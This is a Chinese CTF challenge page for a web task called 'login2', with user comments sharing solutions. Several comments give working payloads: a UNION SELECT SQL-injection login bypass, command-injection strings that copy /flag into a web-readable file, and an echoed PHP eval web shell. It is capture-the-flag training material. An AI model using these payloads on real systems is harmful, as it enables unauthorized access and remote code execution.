login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 2315
提  示: 命令执行
描  述:
login2
评论
5883120xly 1月前

username= ' UNION SELECT '任意用户名', 'fae0b27c451c728867a567e8c1bb4e53' -- password=666 进入命令执行界面输入 666 | cat /flag >2.txt 访问http://117.72.52.127:14324/2.txt即可

回复 0

你文博哥哥 2月前

首先爆破,没出来,sqlmap扫了,账号密码为空,丫的,没法去找有用信息,源码,请求头,都没,最后在返回包找到了tip,解码,得到注入点,username输入admin'union select 1,md5(123)#&password(123),得到监控系统,然后看见输入框,想到了rce,然后尝试输入1,然后输入ls /,没回显,被过滤,后面利用tee命令,将查找写入新文件,访问即可

回复 0

一个姓⎝李⎠的师傅~ 3月前

做了 3 个小时,完整记录了自己的 25 个步骤,sqlmap 省略了因为没有可用信息! 来看看吧,肯定会对你有帮助,联合注入的发现,命令执行写入文件绕过没有网页回显命令内容的办法,包括路径的讲解: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#zIr77

回复 2

꧁༺༽༾ཊCCཏ༿༼༻꧂ 3月前

没难度

回复 1

六分之杰 3月前

https://zhuanlan.zhihu.com/p/7343164566

回复 0

D调丶Slayer 3月前

https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501

回复 0

19957910119 4月前

1&&echo '<?php @eval($_POST['shell']);phpinfo();?>'>test.php

回复 0

ctfer-pls 4月前

看了评论厉害了

回复 0

ilovevicky99 5月前

用反弹shell的方法,为什么没有回显呀

回复 0

zhuizhui 5月前

' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test

回复 0

WriteUp

image
harry

6 金币

评分(9)

解题动态

demonsong 攻破了该题 23小时前
zzuer 攻破了该题 1天前
gondluck 攻破了该题 1天前
awesome 攻破了该题 2天前
17508133836 攻破了该题 2天前
Fengyu3321 攻破了该题 2天前
liojuhsdf 攻破了该题 2天前
igrazee 攻破了该题 3天前
lqianqian 攻破了该题 3天前
邪恶的番茄 攻破了该题 4天前
白菜白又白 攻破了该题 4天前
proll 攻破了该题 4天前
WYYYYTT 攻破了该题 4天前
color111111 攻破了该题 5天前
鲲中霸王 攻破了该题 5天前
铭风 攻破了该题 5天前
Burp 攻破了该题 6天前
igotyou 攻破了该题 6天前
kella 攻破了该题 6天前
奶龙lyb 攻破了该题 7天前
问题反馈